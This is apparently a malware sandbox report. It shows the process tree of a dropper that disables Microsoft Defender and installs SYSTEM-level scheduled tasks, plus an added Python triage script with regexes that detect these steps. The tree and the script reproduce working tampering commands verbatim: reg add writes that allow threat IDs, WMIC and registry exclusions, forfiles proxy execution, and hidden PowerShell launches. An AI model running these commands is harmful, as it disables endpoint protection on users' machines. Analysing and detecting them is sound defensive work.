PID 4440 wrote to memory of 2796 | 4440 | build_4.exe | cmd.exe
PID 4440 wrote to memory of 2796 | 4440 | build_4.exe | cmd.exe
PID 2796 wrote to memory of 2252 | 2796 | cmd.exe | cscript.exe
PID 2796 wrote to memory of 2252 | 2796 | cmd.exe | cscript.exe
PID 2796 wrote to memory of 2252 | 2796 | cmd.exe | cscript.exe
PID 2252 wrote to memory of 3216 | 2252 | cscript.exe | cmd.exe
PID 2252 wrote to memory of 3216 | 2252 | cscript.exe | cmd.exe
PID 2252 wrote to memory of 3216 | 2252 | cscript.exe | cmd.exe
PID 4440 wrote to memory of 2508 | 4440 | build_4.exe | cmd.exe
PID 4440 wrote to memory of 2508 | 4440 | build_4.exe | cmd.exe
PID 4440 wrote to memory of 2508 | 4440 | build_4.exe | cmd.exe
PID 3216 wrote to memory of 4464 | 3216 | cmd.exe | taskkill.exe
PID 3216 wrote to memory of 4464 | 3216 | cmd.exe | taskkill.exe
PID 3216 wrote to memory of 4464 | 3216 | cmd.exe | taskkill.exe
PID 1216 wrote to memory of 2136 | 1216 | powershell.exe | File1.exe
PID 1216 wrote to memory of 2136 | 1216 | powershell.exe | File1.exe
PID 1216 wrote to memory of 2136 | 1216 | powershell.exe | File1.exe
PID 2136 wrote to memory of 4216 | 2136 | File1.exe | RegAsm.exe
PID 2136 wrote to memory of 4216 | 2136 | File1.exe | RegAsm.exe
PID 2136 wrote to memory of 4216 | 2136 | File1.exe | RegAsm.exe
PID 2136 wrote to memory of 4216 | 2136 | File1.exe | RegAsm.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\806b687095169d4ee65405782ba8527ec7f2fcd6918e3da7fa4417377e0cad3a.exe
  1⤵ "C:\Users\Admin\AppData\Local\Temp\806b687095169d4ee65405782ba8527ec7f2fcd6918e3da7fa4417377e0cad3a.exe"
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\SysWOW64\WScript.exe
  2⤵ "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.vbs"
- Suspicious use of WriteProcessMemory
PID:96 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\build_4.exe
  3⤵ "C:\Users\Admin\AppData\Local\Temp\RarSFX0\build_4.exe"
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4212 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\build_4.exe
  4⤵ "C:\Users\Admin\AppData\Local\Temp\RarSFX0\build_4.exe"
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Windows\SysWOW64\cmd.exe
  5⤵ C:\Windows\system32\cmd.exe /c "cscript.exe C:\Users\Public\make.vbs"
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Windows\SysWOW64\cscript.exe
  6⤵ cscript.exe C:\Users\Public\make.vbs
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Windows\SysWOW64\cmd.exe
  7⤵ "C:\Windows\System32\cmd.exe" /c taskkill/IM C:\Users\Public\Channel4.exe /F /t
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\SysWOW64\taskkill.exe
  8⤵ taskkill /IM C:\Users\Public\Channel4.exe /F /t
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4912 -
C:\Windows\SysWOW64\cmd.exe
  5⤵ C:\Windows\system32\cmd.exe /c "del C:\Users\Public\make.vbs"
PID:1660
-
C:\Windows\SysWOW64\cmd.exe
  5⤵ C:\Windows\system32\cmd.exe /c "cscript.exe C:\Users\Public\make.vbs"
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4476 -
C:\Windows\SysWOW64\cscript.exe
  6⤵ cscript.exe C:\Users\Public\make.vbs
- Suspicious use of WriteProcessMemory
PID:1880 -
C:\Windows\SysWOW64\cmd.exe
  7⤵ "C:\Windows\System32\cmd.exe" /c taskkill/IM C:\Users\Public\File1.exe /F /t
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Windows\SysWOW64\taskkill.exe
  8⤵ taskkill /IM C:\Users\Public\File1.exe /F /t
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:792 -
C:\Windows\SysWOW64\cmd.exe
  5⤵ C:\Windows\system32\cmd.exe /c "del C:\Users\Public\make.vbs"
PID:2600
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  5⤵ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -Command "saps C:\Users\Public\File1.exe"
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1216 -
C:\Users\Public\File1.exe
  6⤵ "C:\Users\Public\File1.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  7⤵ "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
- System Location Discovery: System Language Discovery
PID:4216 -
C:\Windows\SysWOW64\cmd.exe
  5⤵ C:\Windows\system32\cmd.exe /c "cscript.exe C:\Users\Public\make.vbs"
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\SysWOW64\cscript.exe
  6⤵ cscript.exe C:\Users\Public\make.vbs
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Windows\SysWOW64\cmd.exe
  7⤵ "C:\Windows\System32\cmd.exe" /c taskkill/IM C:\Users\Public\Windows.exe /F /t
- Suspicious use of WriteProcessMemory
PID:3216 -
C:\Windows\SysWOW64\taskkill.exe
  8⤵ taskkill /IM C:\Users\Public\Windows.exe /F /t
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4464 -
C:\Windows\SysWOW64\cmd.exe
  5⤵ C:\Windows\system32\cmd.exe /c "del C:\Users\Public\make.vbs"
- System Location Discovery: System Language Discovery
PID:2508 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  5⤵ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -Command "saps C:\Users\Public\Windows.exe"
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1336 -
C:\Users\Public\Windows.exe
  6⤵ "C:\Users\Public\Windows.exe"
- Executes dropped EXE
- Checks processor information in registry
PID:4564 -
C:\Users\Admin\AppData\Local\Temp\service123.exe
  7⤵ "C:\Users\Admin\AppData\Local\Temp\service123.exe"
- Executes dropped EXE
- Loads dropped DLL
PID:4980 -
C:\Windows\SysWOW64\schtasks.exe
  7⤵ "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
- Scheduled Task/Job: Scheduled Task
PID:1976 -
C:\Windows\SysWOW64\cmd.exe
  5⤵ C:\Windows\system32\cmd.exe /c "cscript.exe C:\Users\Public\make.vbs"
- System Location Discovery: System Language Discovery
PID:1768 -
C:\Windows\SysWOW64\cscript.exe
  6⤵ cscript.exe C:\Users\Public\make.vbs
PID:3876
-
C:\Windows\SysWOW64\cmd.exe
  7⤵ "C:\Windows\System32\cmd.exe" /c taskkill/IM C:\Users\Public\xarirogemi.exe /F /t
PID:2368
-
C:\Windows\SysWOW64\taskkill.exe
  8⤵ taskkill /IM C:\Users\Public\xarirogemi.exe /F /t
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1556 -
C:\Windows\SysWOW64\cmd.exe
  5⤵ C:\Windows\system32\cmd.exe /c "del C:\Users\Public\make.vbs"
- System Location Discovery: System Language Discovery
PID:904 -
C:\Windows\SysWOW64\cmd.exe
  5⤵ C:\Windows\system32\cmd.exe /c "cscript.exe C:\Users\Public\make.vbs"
- System Location Discovery: System Language Discovery
PID:4732 -
C:\Windows\SysWOW64\cscript.exe
  6⤵ cscript.exe C:\Users\Public\make.vbs
PID:344
-
C:\Windows\SysWOW64\cmd.exe
  7⤵ "C:\Windows\System32\cmd.exe" /c taskkill/IM C:\Users\Public\setup1.exe /F /t
PID:4232
-
C:\Windows\SysWOW64\taskkill.exe
  8⤵ taskkill /IM C:\Users\Public\setup1.exe /F /t
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4128 -
C:\Windows\SysWOW64\cmd.exe
  5⤵ C:\Windows\system32\cmd.exe /c "del C:\Users\Public\make.vbs"
- System Location Discovery: System Language Discovery
PID:4612 -
C:\Windows\SysWOW64\cmd.exe
  5⤵ C:\Windows\system32\cmd.exe /c "cscript.exe C:\Users\Public\make.vbs"
- System Location Discovery: System Language Discovery
PID:4404 -
C:\Windows\SysWOW64\cscript.exe
  6⤵ cscript.exe C:\Users\Public\make.vbs
- System Location Discovery: System Language Discovery
PID:1816 -
C:\Windows\SysWOW64\cmd.exe
  7⤵ "C:\Windows\System32\cmd.exe" /c taskkill/IM C:\Users\Public\385104.exe /F /t
- System Location Discovery: System Language Discovery
PID:3652 -
C:\Windows\SysWOW64\taskkill.exe
  8⤵ taskkill /IM C:\Users\Public\385104.exe /F /t
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4484 -
C:\Windows\SysWOW64\cmd.exe
  5⤵ C:\Windows\system32\cmd.exe /c "del C:\Users\Public\make.vbs"
- System Location Discovery: System Language Discovery
PID:3636 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  5⤵ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -Command "saps C:\Users\Public\385104.exe"
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2480 -
C:\Users\Public\385104.exe
  6⤵ "C:\Users\Public\385104.exe"
- Executes dropped EXE
PID:2768 -
C:\Users\Admin\AppData\Local\Temp\7zS60C4.tmp\Install.exe
  7⤵ .\Install.exe
- Executes dropped EXE
PID:304 -
C:\Users\Admin\AppData\Local\Temp\7zS6315.tmp\Install.exe
  8⤵ .\Install.exe /QmQuZdidEuh "385104" /S
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:1412 -
C:\Windows\SysWOW64\cmd.exe
  9⤵ "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
PID:3596
-
C:\Windows\SysWOW64\forfiles.exe
  10⤵ forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:4756 -
C:\Windows\SysWOW64\cmd.exe
  11⤵ /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
PID:4764
-
\??\c:\windows\SysWOW64\reg.exe
  12⤵ reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
PID:1676
-
C:\Windows\SysWOW64\forfiles.exe
  10⤵ forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:1788 -
C:\Windows\SysWOW64\cmd.exe
  11⤵ /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
- System Location Discovery: System Language Discovery
PID:3012 -
\??\c:\windows\SysWOW64\reg.exe
  12⤵ reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
PID:4916
-
C:\Windows\SysWOW64\forfiles.exe
  10⤵ forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
- Indirect Command Execution
PID:3276 -
C:\Windows\SysWOW64\cmd.exe
  11⤵ /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
- System Location Discovery: System Language Discovery
PID:4308 -
\??\c:\windows\SysWOW64\reg.exe
  12⤵ reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
PID:1660
-
C:\Windows\SysWOW64\forfiles.exe
  10⤵ forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:4884 -
C:\Windows\SysWOW64\cmd.exe
  11⤵ /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
PID:5100
-
\??\c:\windows\SysWOW64\reg.exe
  12⤵ reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
PID:856
-
C:\Windows\SysWOW64\forfiles.exe
  10⤵ forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
- Indirect Command Execution
PID:4044 -
C:\Windows\SysWOW64\cmd.exe
  11⤵ /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
PID:5040
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  12⤵ powershell start-process -WindowStyle Hidden gpupdate.exe /force
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1480 -
C:\Windows\SysWOW64\gpupdate.exe
  13⤵ "C:\Windows\system32\gpupdate.exe" /force
PID:3192
-
C:\Windows\SysWOW64\forfiles.exe
  9⤵ "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2060 -
C:\Windows\SysWOW64\cmd.exe
  10⤵ /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
PID:1816
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  11⤵ powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3116 -
C:\Windows\SysWOW64\Wbem\WMIC.exe
  12⤵ "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4396 -
C:\Windows\SysWOW64\schtasks.exe
  9⤵ schtasks /CREATE /TN "bOYLEOfZCACcRQIJvG" /SC once /ST 05:09:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS6315.tmp\Install.exe\" c9 /LjdidcI 385104 /S" /V1 /F
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:316 -
C:\Windows\SysWOW64\WerFault.exe
  9⤵ C:\Windows\SysWOW64\WerFault.exe -u -p 1412 -s 684
- Program crash
PID:4372
-
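The tree above records the dropper's Defender evasion step by step: reg.exe (proxied through forfiles so that where.exe, calc.exe, waitfor.exe and help.exe appear as the launcher) writes ThreatIDDefaultAction values of 6 under the Defender policy key, a PowerShell batch does the same for a longer list of threat IDs and adds policy path exclusions for the drop folders, WMIC adds an .exe extension exclusion through MSFT_MpPreference, gpupdate /force makes the new policy take effect, and schtasks installs Install.exe as a SYSTEM task. One detail the tree makes visible: PowerShell treats `;` as a statement separator, so only the first REG ADD of each batch runs through cmd.exe and the remaining ones run reg.exe directly as siblings at level 3.

The following Python script is an added example, not part of the sandbox report and not a vendor signature: it applies the checks an analyst would run over Sysmon event 1 or EDR process-creation command lines to flag exactly these behaviours. The embedded command lines are copied from the tree (the two long REG ADD batches trimmed to two entries each) plus one constructed benign control; the rule names, the regexes and the argument order they assume (`/f /v <name> /t <type> /d <data>`, as this sample writes it) are the author's own choices and would need widening for other samples.

```python
"""Triage helper for the command lines recorded in the process tree above.

Added example (not part of the sandbox report, not a vendor signature):
the checks an analyst would run over Sysmon event 1 / EDR process-creation
logs to flag the Defender tampering, LOLBin proxying and persistence this
sample performs. Rule names and regexes are the author's own assumptions.
"""
import re
from collections import defaultdict

# Defender ThreatAction values as Microsoft documents them for the
# ThreatIDDefaultAction policy. The sample writes 6 (Allow), which tells the
# engine to let every detection with that threat ID run instead of quarantining it.
THREAT_ACTIONS = {"1": "Clean", "2": "Quarantine", "3": "Remove", "6": "Allow",
                  "8": "UserDefined", "9": "NoAction", "10": "Block"}

# Matches the plain form (/v 2147735503) and the PowerShell-escaped form
# (/v \"225451\") seen in the tree; assumes the /f /v ... /t ... /d order.
THREAT_ID_RE = re.compile(
    r'ThreatIDDefaultAction\\?"?\s+/f\s+/v\s+\\?"?(\d+)\\?"?\s+/t\s+REG_SZ\s+/d\s+(\d+)',
    re.IGNORECASE)
# Policy path exclusions (Exclusions\Paths, value name = folder, data 0).
EXCL_PATH_RE = re.compile(
    r'Exclusions\\Paths\\?"?\s+/f\s+/v\s+\\?"(.+?)\\?"\s+/t\s+REG_DWORD\s+/d\s+0',
    re.IGNORECASE)
# WMI route with the same effect as Add-MpPreference -ExclusionExtension.
WMIC_EXCL_RE = re.compile(r'MSFT_MpPreference\s+call\s+Add\s+(Exclusion\w+)=(\S+)',
                          re.IGNORECASE)
# forfiles as an execution proxy: /m names a file that merely has to exist,
# /c is the command that actually runs (MITRE ATT&CK T1202).
FORFILES_RE = re.compile(r'forfiles(?:\.exe)?"?\s[^"]*?/m\s+(\S+)\s+/c\s+"cmd\s+/C',
                         re.IGNORECASE)
SCHTASKS_RE = re.compile(r'schtasks(?:\.exe")?\s+/create\b.*?/tn\s+"([^"]+)"',
                         re.IGNORECASE)
RUN_AS_SYSTEM_RE = re.compile(r'/ru\s+"?system"?', re.IGNORECASE)
HIDDEN_PS_RE = re.compile(r'powershell(?:\.exe")?.*?-WindowStyle\s+hidden', re.IGNORECASE)
SAPS_RE = re.compile(r'\bsaps\s+(\S+)')  # 'saps' is the built-in alias of Start-Process


def analyze(cmdline):
    """Return a list of (rule, detail) findings for one process command line."""
    findings = []
    for threat_id, action in THREAT_ID_RE.findall(cmdline):
        label = THREAT_ACTIONS.get(action, "unknown")
        findings.append(("defender.threat_default_action",
                         f"ThreatID {threat_id} -> {action} ({label})"))
    for path in EXCL_PATH_RE.findall(cmdline):
        findings.append(("defender.policy_exclusion_path", path))
    for kind, value in WMIC_EXCL_RE.findall(cmdline):
        findings.append(("defender.wmic_exclusion", f"{kind}={value}"))
    for proxy in FORFILES_RE.findall(cmdline):
        findings.append(("lolbin.forfiles_indirect_exec", proxy))
    task = SCHTASKS_RE.search(cmdline)
    if task:
        name = task.group(1)
        if RUN_AS_SYSTEM_RE.search(cmdline):
            name += " (RunAs SYSTEM)"
        findings.append(("persistence.scheduled_task", name))
    if HIDDEN_PS_RE.search(cmdline):
        findings.append(("execution.hidden_powershell", "-WindowStyle hidden"))
    saps = SAPS_RE.search(cmdline)
    if saps:
        findings.append(("execution.start_process_alias", saps.group(1).strip('"')))
    return findings


def summarize(cmdlines):
    """Aggregate findings over many command lines: rule -> sorted unique details."""
    report = defaultdict(set)
    for line in cmdlines:
        for rule, detail in analyze(line):
            report[rule].add(detail)
    return {rule: sorted(details) for rule, details in report.items()}


# Command lines copied from the process tree above (the two long REG ADD
# batches trimmed to two entries each) plus one constructed benign control.
SAMPLE_CMDLINES = [
    r'''"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"''',
    r'''powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True''',
    r'''schtasks /CREATE /TN "bOYLEOfZCACcRQIJvG" /SC once /ST 05:09:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS6315.tmp\Install.exe\" c9 /LjdidcI 385104 /S" /V1 /F''',
    r'''powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;"''',
    r'''powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FDxSmxakU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\IrAQtycGxHJKWAVB\" /t REG_DWORD /d 0 /reg:64;"''',
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -Command "saps C:\Users\Public\File1.exe"''',
    r'''"C:\Windows\System32\notepad.exe" C:\Users\Admin\Documents\notes.txt''',  # constructed benign control
]

if __name__ == "__main__":
    for rule, details in sorted(summarize(SAMPLE_CMDLINES).items()):
        print(rule)
        for detail in details:
            print("   ", detail)
```

Run stand-alone it prints one block per rule; fed the full tree it yields the complete list of threat IDs switched to Allow and the folders and extension excluded, which is the artefact list to hand to the host owner for rollback. The regexes deliberately key on the Policies\Microsoft\Windows Defender key rather than on reg.exe itself, because the same writes arrive here through three different parents (forfiles, cmd.exe and PowerShell) and a parent-based rule would miss two of them.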
C:\Users\Admin\AppData\Local\Temp\service123.exe
  1⤵ C:\Users\Admin\AppData\Local\Temp\/service123.exe
- Executes dropped EXE
- Loads dropped DLL
PID:2988
-
C:\Users\Admin\AppData\Local\Temp\7zS6315.tmp\Install.exe
  1⤵ C:\Users\Admin\AppData\Local\Temp\7zS6315.tmp\Install.exe c9 /LjdidcI 385104 /S
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2152 -
C:\Windows\SysWOW64\cmd.exe
  2⤵ "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
PID:4936
-
C:\Windows\SysWOW64\forfiles.exe
  3⤵ forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
- Indirect Command Execution
PID:2756 -
C:\Windows\SysWOW64\cmd.exe
  4⤵ /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
PID:700
-
\??\c:\windows\SysWOW64\reg.exe
  5⤵ reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
PID:504
-
C:\Windows\SysWOW64\forfiles.exe
  3⤵ forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
- Indirect Command Execution
PID:1616 -
C:\Windows\SysWOW64\cmd.exe
  4⤵ /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
- System Location Discovery: System Language Discovery
PID:1676 -
\??\c:\windows\SysWOW64\reg.exe
  5⤵ reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
- System Location Discovery: System Language Discovery
PID:4764 -
C:\Windows\SysWOW64\forfiles.exe
  3⤵ forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
- Indirect Command Execution
PID:4756 -
C:\Windows\SysWOW64\cmd.exe
  4⤵ /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
PID:4372
-
\??\c:\windows\SysWOW64\reg.exe
  5⤵ reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
PID:588
-
C:\Windows\SysWOW64\forfiles.exe
  3⤵ forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
- Indirect Command Execution
PID:2144 -
C:\Windows\SysWOW64\cmd.exe
  4⤵ /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
- System Location Discovery: System Language Discovery
PID:1308 -
\??\c:\windows\SysWOW64\reg.exe
  5⤵ reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
PID:1932
-
C:\Windows\SysWOW64\forfiles.exe
  3⤵ forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
- Indirect Command Execution
PID:4872 -
C:\Windows\SysWOW64\cmd.exe
  4⤵ /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
PID:1584
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  5⤵ powershell start-process -WindowStyle Hidden gpupdate.exe /force
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3064 -
C:\Windows\SysWOW64\gpupdate.exe
